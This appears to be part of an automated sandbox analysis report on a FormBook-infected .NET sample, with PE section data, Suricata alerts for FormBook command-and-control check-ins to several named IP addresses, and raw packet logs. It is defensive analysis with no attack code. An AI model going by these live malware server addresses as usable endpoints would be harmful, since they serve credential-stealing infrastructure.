                                              .reloc0xec0000xc0x2003ca0c11b7681be6b24249ecfdc5bfb10False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_VERSION0xea0900x388data0.4247787610619469
                                              RT_MANIFEST0xea4280x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                              Imports

                                              DLLImport
                                              mscoree.dll_CorExeMain

                                              Network Behavior

                                              Suricata IDS Alerts

                                              TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                              2024-07-26T13:58:07.135377+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34976280192.168.2.43.33.130.190
                                              2024-07-26T13:57:10.036735+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34974580192.168.2.4195.200.3.58
                                              2024-07-26T13:57:35.005440+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34975280192.168.2.4217.160.164.240
                                              2024-07-26T13:57:12.627565+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34974680192.168.2.4195.200.3.58
                                              2024-07-26T13:57:56.269959+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M24975980192.168.2.4203.161.42.162
                                              2024-07-26T13:57:24.070738+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34974980192.168.2.43.33.130.190
                                              2024-07-26T13:58:16.188839+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34976480192.168.2.4103.29.180.74
                                              2024-07-26T13:58:19.218798+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34976580192.168.2.4103.29.180.74
                                              2024-07-26T13:56:15.151948+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434974140.68.123.157192.168.2.4
                                              2024-07-26T13:57:51.120537+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34975780192.168.2.4203.161.42.162
                                              2024-07-26T13:57:48.598378+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34975680192.168.2.4203.161.42.162
                                              2024-07-26T13:58:01.968155+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34976080192.168.2.43.33.130.190
                                              2024-07-26T13:58:27.994998+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M24976780192.168.2.4103.29.180.74
                                              2024-07-26T13:57:21.514806+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34974880192.168.2.43.33.130.190
                                              2024-07-26T13:56:46.525961+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M24974380192.168.2.43.33.130.190
                                              2024-07-26T13:57:42.778805+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M24975580192.168.2.4217.160.164.240
                                              2024-07-26T13:57:26.659151+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34975080192.168.2.43.33.130.190
                                              2024-07-26T13:57:07.403866+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34974480192.168.2.4195.200.3.58
                                              2024-07-26T13:57:37.598909+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34975380192.168.2.4217.160.164.240
                                              2024-07-26T13:57:53.745534+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34975880192.168.2.4203.161.42.162
                                              2024-07-26T13:57:29.248423+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M24975180192.168.2.43.33.130.190
                                              2024-07-26T13:55:36.931527+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434973540.68.123.157192.168.2.4
                                              2024-07-26T13:58:21.796033+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34976680192.168.2.4103.29.180.74
                                              2024-07-26T13:58:09.696547+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M24976380192.168.2.43.33.130.190
                                              2024-07-26T13:57:15.383180+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M24974780192.168.2.4195.200.3.58
                                              2024-07-26T13:58:04.542850+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34976180192.168.2.43.33.130.190
                                              2024-07-26T13:57:40.170047+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M34975480192.168.2.4217.160.164.240

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jul 26, 2024 13:56:46.020207882 CEST4974380192.168.2.43.33.130.190
                                              Jul 26, 2024 13:56:46.025207996 CEST80497433.33.130.190192.168.2.4
                                              Jul 26, 2024 13:56:46.025307894 CEST4974380192.168.2.43.33.130.190
                                              Jul 26, 2024 13:56:46.052898884 CEST4974380192.168.2.43.33.130.190
                                              Jul 26, 2024 13:56:46.057876110 CEST80497433.33.130.190192.168.2.4
                                              Jul 26, 2024 13:56:46.525693893 CEST80497433.33.130.190192.168.2.4
                                              Jul 26, 2024 13:56:46.525893927 CEST80497433.33.130.190192.168.2.4
                                              Jul 26, 2024 13:56:46.525960922 CEST4974380192.168.2.43.33.130.190
                                              Jul 26, 2024 13:56:46.540435076 CEST4974380192.168.2.43.33.130.190
                                              Jul 26, 2024 13:56:46.547163010 CEST80497433.33.130.190192.168.2.4
                                              Jul 26, 2024 13:57:06.683053970 CEST4974480192.168.2.4195.200.3.58
                                              Jul 26, 2024 13:57:06.688648939 CEST8049744195.200.3.58192.168.2.4
                                              Jul 26, 2024 13:57:06.688755035 CEST4974480192.168.2.4195.200.3.58
                                              Jul 26, 2024 13:57:06.716505051 CEST4974480192.168.2.4195.200.3.58
                                              Jul 26, 2024 13:57:06.721849918 CEST8049744195.200.3.58192.168.2.4
                                              Jul 26, 2024 13:57:07.403541088 CEST8049744195.200.3.58192.168.2.4
                                              Jul 26, 2024 13:57:07.403779030 CEST8049744195.200.3.58192.168.2.4
                                              Jul 26, 2024 13:57:07.403866053 CEST4974480192.168.2.4195.200.3.58
                                              Jul 26, 2024 13:57:08.233962059 CEST4974480192.168.2.4195.200.3.58
                                              Jul 26, 2024 13:57:09.273534060 CEST4974580192.168.2.4195.200.3.58
                                              Jul 26, 2024 13:57:09.278716087 CEST8049745195.200.3.58192.168.2.4
                                              Jul 26, 2024 13:57:09.278853893 CEST4974580192.168.2.4195.200.3.58
                                              Jul 26, 2024 13:57:09.309747934 CEST4974580192.168.2.4195.200.3.58
                                              Jul 26, 2024 13:57:09.315817118 CEST8049745195.200.3.58192.168.2.4
                                              Jul 26, 2024 13:57:10.034441948 CEST8049745195.200.3.58192.168.2.4
                                              Jul 26, 2024 13:57:10.036633968 CEST8049745195.200.3.58192.168.2.4
                                              Jul 26, 2024 13:57:10.036735058 CEST4974580192.168.2.4195.200.3.58
                                              Jul 26, 2024 13:57:10.827549934 CEST4974580192.168.2.4195.200.3.58
                                              Jul 26, 2024 13:57:11.887326002 CEST4974680192.168.2.4195.200.3.58
                                              Jul 26, 2024 13:57:11.892690897 CEST8049746195.200.3.58192.168.2.4
                                              Jul 26, 2024 13:57:11.892775059 CEST4974680192.168.2.4195.200.3.58
                                              Jul 26, 2024 13:57:11.917023897 CEST4974680192.168.2.4195.200.3.58
                                              Jul 26, 2024 13:57:11.924685001 CEST8049746195.200.3.58192.168.2.4
                                              Jul 26, 2024 13:57:11.924695969 CEST8049746195.200.3.58192.168.2.4
                                              Jul 26, 2024 13:57:11.924720049 CEST8049746195.200.3.58192.168.2.4
                                              Jul 26, 2024 13:57:11.924725056 CEST8049746195.200.3.58192.168.2.4
                                              Jul 26, 2024 13:57:11.924949884 CEST8049746195.200.3.58192.168.2.4
                                              Jul 26, 2024 13:57:11.924962044 CEST8049746195.200.3.58192.168.2.4
                                              Jul 26, 2024 13:57:11.925220013 CEST8049746195.200.3.58192.168.2.4
                                              Jul 26, 2024 13:57:11.925225973 CEST8049746195.200.3.58192.168.2.4
                                              Jul 26, 2024 13:57:11.925396919 CEST8049746195.200.3.58192.168.2.4
                                              Jul 26, 2024 13:57:12.627418041 CEST8049746195.200.3.58192.168.2.4
                                              Jul 26, 2024 13:57:12.627477884 CEST8049746195.200.3.58192.168.2.4
                                              Jul 26, 2024 13:57:12.627564907 CEST4974680192.168.2.4195.200.3.58
                                              Jul 26, 2024 13:57:13.425496101 CEST4974680192.168.2.4195.200.3.58
                                              Jul 26, 2024 13:57:14.456585884 CEST4974780192.168.2.4195.200.3.58
                                              Jul 26, 2024 13:57:14.549901009 CEST8049747195.200.3.58192.168.2.4
                                              Jul 26, 2024 13:57:14.550039053 CEST4974780192.168.2.4195.200.3.58
                                              Jul 26, 2024 13:57:14.568001986 CEST4974780192.168.2.4195.200.3.58
                                              Jul 26, 2024 13:57:14.573016882 CEST8049747195.200.3.58192.168.2.4
                                              Jul 26, 2024 13:57:15.382633924 CEST8049747195.200.3.58192.168.2.4
                                              Jul 26, 2024 13:57:15.382694960 CEST8049747195.200.3.58192.168.2.4
                                              Jul 26, 2024 13:57:15.382730961 CEST8049747195.200.3.58192.168.2.4
                                              Jul 26, 2024 13:57:15.383179903 CEST4974780192.168.2.4195.200.3.58
                                              Jul 26, 2024 13:57:15.393238068 CEST4974780192.168.2.4195.200.3.58
                                              Jul 26, 2024 13:57:15.398447990 CEST8049747195.200.3.58192.168.2.4
                                              Jul 26, 2024 13:57:21.021348953 CEST4974880192.168.2.43.33.130.190
                                              Jul 26, 2024 13:57:21.026330948 CEST80497483.33.130.190192.168.2.4
                                              Jul 26, 2024 13:57:21.026487112 CEST4974880192.168.2.43.33.130.190
                                              Jul 26, 2024 13:57:21.050584078 CEST4974880192.168.2.43.33.130.190
                                              Jul 26, 2024 13:57:21.055557013 CEST80497483.33.130.190192.168.2.4
                                              Jul 26, 2024 13:57:21.514560938 CEST80497483.33.130.190192.168.2.4
                                              Jul 26, 2024 13:57:21.514806032 CEST4974880192.168.2.43.33.130.190
                                              Jul 26, 2024 13:57:22.561831951 CEST4974880192.168.2.43.33.130.190
                                              Jul 26, 2024 13:57:22.566922903 CEST80497483.33.130.190192.168.2.4
                                              Jul 26, 2024 13:57:23.593908072 CEST4974980192.168.2.43.33.130.190
                                              Jul 26, 2024 13:57:23.599275112 CEST80497493.33.130.190192.168.2.4
                                              Jul 26, 2024 13:57:23.599369049 CEST4974980192.168.2.43.33.130.190
                                              Jul 26, 2024 13:57:23.617557049 CEST4974980192.168.2.43.33.130.190
                                              Jul 26, 2024 13:57:23.622528076 CEST80497493.33.130.190192.168.2.4
                                              Jul 26, 2024 13:57:24.070580959 CEST80497493.33.130.190192.168.2.4
                                              Jul 26, 2024 13:57:24.070738077 CEST4974980192.168.2.43.33.130.190
                                              Jul 26, 2024 13:57:25.124475002 CEST4974980192.168.2.43.33.130.190
                                              Jul 26, 2024 13:57:25.129533052 CEST80497493.33.130.190192.168.2.4
                                              Jul 26, 2024 13:57:26.166255951 CEST4975080192.168.2.43.33.130.190
                                              Jul 26, 2024 13:57:26.171667099 CEST80497503.33.130.190192.168.2.4
                                              Jul 26, 2024 13:57:26.171780109 CEST4975080192.168.2.43.33.130.190
                                              Jul 26, 2024 13:57:26.203167915 CEST4975080192.168.2.43.33.130.190
                                              Jul 26, 2024 13:57:26.247764111 CEST4975080192.168.2.43.33.130.190
                                              Jul 26, 2024 13:57:26.521840096 CEST80497503.33.130.190192.168.2.4
                                              Jul 26, 2024 13:57:26.522989035 CEST80497503.33.130.190192.168.2.4
                                              Jul 26, 2024 13:57:26.523101091 CEST80497503.33.130.190192.168.2.4
                                              Jul 26, 2024 13:57:26.523286104 CEST80497503.33.130.190192.168.2.4
                                              Jul 26, 2024 13:57:26.523298979 CEST80497503.33.130.190192.168.2.4
                                              Jul 26, 2024 13:57:26.523314953 CEST80497503.33.130.190192.168.2.4
                                              Jul 26, 2024 13:57:26.523361921 CEST80497503.33.130.190192.168.2.4
                                              Jul 26, 2024 13:57:26.523435116 CEST80497503.33.130.190192.168.2.4
                                              Jul 26, 2024 13:57:26.523458958 CEST80497503.33.130.190192.168.2.4
                                              Jul 26, 2024 13:57:26.523472071 CEST80497503.33.130.190192.168.2.4
                                              Jul 26, 2024 13:57:26.659058094 CEST80497503.33.130.190192.168.2.4
                                              Jul 26, 2024 13:57:26.659151077 CEST4975080192.168.2.43.33.130.190
                                              Jul 26, 2024 13:57:27.718070030 CEST4975080192.168.2.43.33.130.190
                                              Jul 26, 2024 13:57:27.723108053 CEST80497503.33.130.190192.168.2.4
                                              Jul 26, 2024 13:57:28.751107931 CEST4975180192.168.2.43.33.130.190
                                              Jul 26, 2024 13:57:28.758465052 CEST80497513.33.130.190192.168.2.4
                                              Jul 26, 2024 13:57:28.758567095 CEST4975180192.168.2.43.33.130.190
                                              Jul 26, 2024 13:57:28.775079966 CEST4975180192.168.2.43.33.130.190
                                              Jul 26, 2024 13:57:28.782737017 CEST80497513.33.130.190192.168.2.4
                                              Jul 26, 2024 13:57:29.248251915 CEST80497513.33.130.190192.168.2.4
                                              Jul 26, 2024 13:57:29.248358965 CEST80497513.33.130.190192.168.2.4
                                              Jul 26, 2024 13:57:29.248423100 CEST4975180192.168.2.43.33.130.190
                                              Jul 26, 2024 13:57:29.256911993 CEST4975180192.168.2.43.33.130.190
                                              Jul 26, 2024 13:57:29.261938095 CEST80497513.33.130.190192.168.2.4
                                              Jul 26, 2024 13:57:34.364403009 CEST4975280192.168.2.4217.160.164.240
                                              Jul 26, 2024 13:57:34.371027946 CEST8049752217.160.164.240192.168.2.4
                                              Jul 26, 2024 13:57:34.371206045 CEST4975280192.168.2.4217.160.164.240
                                              Jul 26, 2024 13:57:34.403213978 CEST4975280192.168.2.4217.160.164.240
                                              Jul 26, 2024 13:57:34.408361912 CEST8049752217.160.164.240192.168.2.4
                                              Jul 26, 2024 13:57:35.005362988 CEST8049752217.160.164.240192.168.2.4
                                              Jul 26, 2024 13:57:35.005383968 CEST8049752217.160.164.240192.168.2.4
                                              Jul 26, 2024 13:57:35.005439997 CEST4975280192.168.2.4217.160.164.240
                                              Jul 26, 2024 13:57:35.925256968 CEST4975280192.168.2.4217.160.164.240
                                              Jul 26, 2024 13:57:36.961158991 CEST4975380192.168.2.4217.160.164.240
                                              Jul 26, 2024 13:57:36.966358900 CEST8049753217.160.164.240192.168.2.4
                                              Jul 26, 2024 13:57:36.966481924 CEST4975380192.168.2.4217.160.164.240
                                              Jul 26, 2024 13:57:36.987916946 CEST4975380192.168.2.4217.160.164.240
                                              Jul 26, 2024 13:57:36.992810965 CEST8049753217.160.164.240192.168.2.4
                                              Jul 26, 2024 13:57:37.598294973 CEST8049753217.160.164.240192.168.2.4
                                              Jul 26, 2024 13:57:37.598849058 CEST8049753217.160.164.240192.168.2.4
                                              Jul 26, 2024 13:57:37.598908901 CEST4975380192.168.2.4217.160.164.240
                                              Jul 26, 2024 13:57:38.499285936 CEST4975380192.168.2.4217.160.164.240
                                              Jul 26, 2024 13:57:39.537416935 CEST4975480192.168.2.4217.160.164.240
                                              Jul 26, 2024 13:57:39.542629957 CEST8049754217.160.164.240192.168.2.4
                                              Jul 26, 2024 13:57:39.542709112 CEST4975480192.168.2.4217.160.164.240
                                              Jul 26, 2024 13:57:39.562014103 CEST4975480192.168.2.4217.160.164.240
                                              Jul 26, 2024 13:57:39.567253113 CEST8049754217.160.164.240192.168.2.4
                                              Jul 26, 2024 13:57:39.567295074 CEST8049754217.160.164.240192.168.2.4
                                              Jul 26, 2024 13:57:39.567323923 CEST8049754217.160.164.240192.168.2.4
                                              Jul 26, 2024 13:57:39.567352057 CEST8049754217.160.164.240192.168.2.4
                                              Jul 26, 2024 13:57:39.567404985 CEST8049754217.160.164.240192.168.2.4
                                              Jul 26, 2024 13:57:39.567431927 CEST8049754217.160.164.240192.168.2.4
                                              Jul 26, 2024 13:57:39.567459106 CEST8049754217.160.164.240192.168.2.4
                                              Jul 26, 2024 13:57:39.567485094 CEST8049754217.160.164.240192.168.2.4
                                              Jul 26, 2024 13:57:39.567512035 CEST8049754217.160.164.240192.168.2.4
                                              Jul 26, 2024 13:57:40.169842958 CEST8049754217.160.164.240192.168.2.4
                                              Jul 26, 2024 13:57:40.169996023 CEST8049754217.160.164.240192.168.2.4
                                              Jul 26, 2024 13:57:40.170047045 CEST4975480192.168.2.4217.160.164.240
                                              Jul 26, 2024 13:57:41.081263065 CEST4975480192.168.2.4217.160.164.240
                                              Jul 26, 2024 13:57:42.135001898 CEST4975580192.168.2.4217.160.164.240
                                              Jul 26, 2024 13:57:42.139982939 CEST8049755217.160.164.240192.168.2.4
                                              Jul 26, 2024 13:57:42.140058041 CEST4975580192.168.2.4217.160.164.240
                                              Jul 26, 2024 13:57:42.160996914 CEST4975580192.168.2.4217.160.164.240
                                              Jul 26, 2024 13:57:42.166980028 CEST8049755217.160.164.240192.168.2.4
                                              Jul 26, 2024 13:57:42.775219917 CEST8049755217.160.164.240192.168.2.4
                                              Jul 26, 2024 13:57:42.775408983 CEST8049755217.160.164.240192.168.2.4
                                              Jul 26, 2024 13:57:42.778805017 CEST4975580192.168.2.4217.160.164.240
                                              Jul 26, 2024 13:57:42.786786079 CEST4975580192.168.2.4217.160.164.240
                                              Jul 26, 2024 13:57:42.792135000 CEST8049755217.160.164.240192.168.2.4
                                              Jul 26, 2024 13:57:47.937517881 CEST4975680192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:47.943717957 CEST8049756203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:47.943799973 CEST4975680192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:47.969371080 CEST4975680192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:47.974838972 CEST8049756203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:48.598254919 CEST8049756203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:48.598279953 CEST8049756203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:48.598377943 CEST4975680192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:49.483828068 CEST4975680192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:50.516726017 CEST4975780192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:50.522052050 CEST8049757203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:50.522138119 CEST4975780192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:50.546781063 CEST4975780192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:50.551923990 CEST8049757203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:51.119266987 CEST8049757203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:51.119677067 CEST8049757203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:51.120537043 CEST4975780192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:52.046986103 CEST4975780192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:53.078775883 CEST4975880192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:53.083863974 CEST8049758203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:53.088535070 CEST4975880192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:53.114577055 CEST4975880192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:53.119837999 CEST8049758203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:53.119894981 CEST8049758203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:53.119908094 CEST8049758203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:53.119921923 CEST8049758203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:53.119983912 CEST8049758203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:53.120012045 CEST8049758203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:53.120034933 CEST8049758203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:53.120064974 CEST8049758203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:53.120105982 CEST8049758203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:53.744334936 CEST8049758203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:53.744472980 CEST8049758203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:53.745533943 CEST4975880192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:54.627418995 CEST4975880192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:55.655805111 CEST4975980192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:55.661268950 CEST8049759203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:55.661341906 CEST4975980192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:55.678356886 CEST4975980192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:55.683525085 CEST8049759203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:56.269808054 CEST8049759203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:56.269840002 CEST8049759203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:56.269958973 CEST4975980192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:56.281194925 CEST4975980192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:56.286067963 CEST8049759203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:58:01.494939089 CEST4976080192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:01.500055075 CEST80497603.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:01.500133038 CEST4976080192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:01.520011902 CEST4976080192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:01.525543928 CEST80497603.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:01.968091011 CEST80497603.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:01.968154907 CEST4976080192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:03.030796051 CEST4976080192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:03.035865068 CEST80497603.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:04.068887949 CEST4976180192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:04.073962927 CEST80497613.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:04.074033976 CEST4976180192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:04.096533060 CEST4976180192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:04.101572990 CEST80497613.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:04.542303085 CEST80497613.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:04.542850018 CEST4976180192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:05.608774900 CEST4976180192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:05.617307901 CEST80497613.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:06.641310930 CEST4976280192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:06.647563934 CEST80497623.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:06.647746086 CEST4976280192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:06.666810036 CEST4976280192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:06.672077894 CEST80497623.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:06.672096014 CEST80497623.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:06.672108889 CEST80497623.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:06.672122002 CEST80497623.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:06.672133923 CEST80497623.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:06.672146082 CEST80497623.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:06.672161102 CEST80497623.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:06.672173023 CEST80497623.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:06.672185898 CEST80497623.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:07.135242939 CEST80497623.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:07.135376930 CEST4976280192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:08.171802998 CEST4976280192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:08.177292109 CEST80497623.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:09.210796118 CEST4976380192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:09.216021061 CEST80497633.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:09.216945887 CEST4976380192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:09.235198975 CEST4976380192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:09.242562056 CEST80497633.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:09.696382999 CEST80497633.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:09.696409941 CEST80497633.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:09.696547031 CEST4976380192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:09.706958055 CEST4976380192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:09.722280025 CEST80497633.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:15.118810892 CEST4976480192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:15.124010086 CEST8049764103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:15.124097109 CEST4976480192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:15.145391941 CEST4976480192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:15.151241064 CEST8049764103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:16.188232899 CEST8049764103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:16.188775063 CEST8049764103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:16.188838959 CEST4976480192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:16.655575037 CEST4976480192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:17.688535929 CEST4976580192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:17.693696022 CEST8049765103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:17.693783998 CEST4976580192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:17.713274002 CEST4976580192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:17.718835115 CEST8049765103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:19.218797922 CEST4976580192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:19.267316103 CEST8049765103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:20.257316113 CEST4976680192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:20.263161898 CEST8049766103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:20.263231993 CEST4976680192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:20.286775112 CEST4976680192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:20.291985989 CEST8049766103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:20.292045116 CEST8049766103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:20.292072058 CEST8049766103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:20.292098999 CEST8049766103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:20.292146921 CEST8049766103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:20.292174101 CEST8049766103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:20.292198896 CEST8049766103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:20.292246103 CEST8049766103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:20.292272091 CEST8049766103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:21.796032906 CEST4976680192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:21.843539000 CEST8049766103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:23.143615007 CEST4976780192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:23.252674103 CEST8049767103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:23.252768040 CEST4976780192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:23.270807028 CEST4976780192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:23.277683973 CEST8049767103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:23.951246977 CEST8049766103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:23.951322079 CEST4976680192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:27.366667032 CEST8049765103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:27.366741896 CEST4976580192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:27.994468927 CEST8049767103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:27.994875908 CEST8049767103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:27.994997978 CEST4976780192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:28.002576113 CEST4976780192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:28.013602018 CEST8049767103.29.180.74192.168.2.4

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jul 26, 2024 13:56:45.988498926 CEST5253453192.168.2.41.1.1.1
                                              Jul 26, 2024 13:56:46.002851009 CEST53525341.1.1.1192.168.2.4
                                              Jul 26, 2024 13:57:06.614130020 CEST5869653192.168.2.41.1.1.1
                                              Jul 26, 2024 13:57:06.673705101 CEST53586961.1.1.1192.168.2.4
                                              Jul 26, 2024 13:57:20.427733898 CEST5159153192.168.2.41.1.1.1
                                              Jul 26, 2024 13:57:21.011578083 CEST53515911.1.1.1192.168.2.4
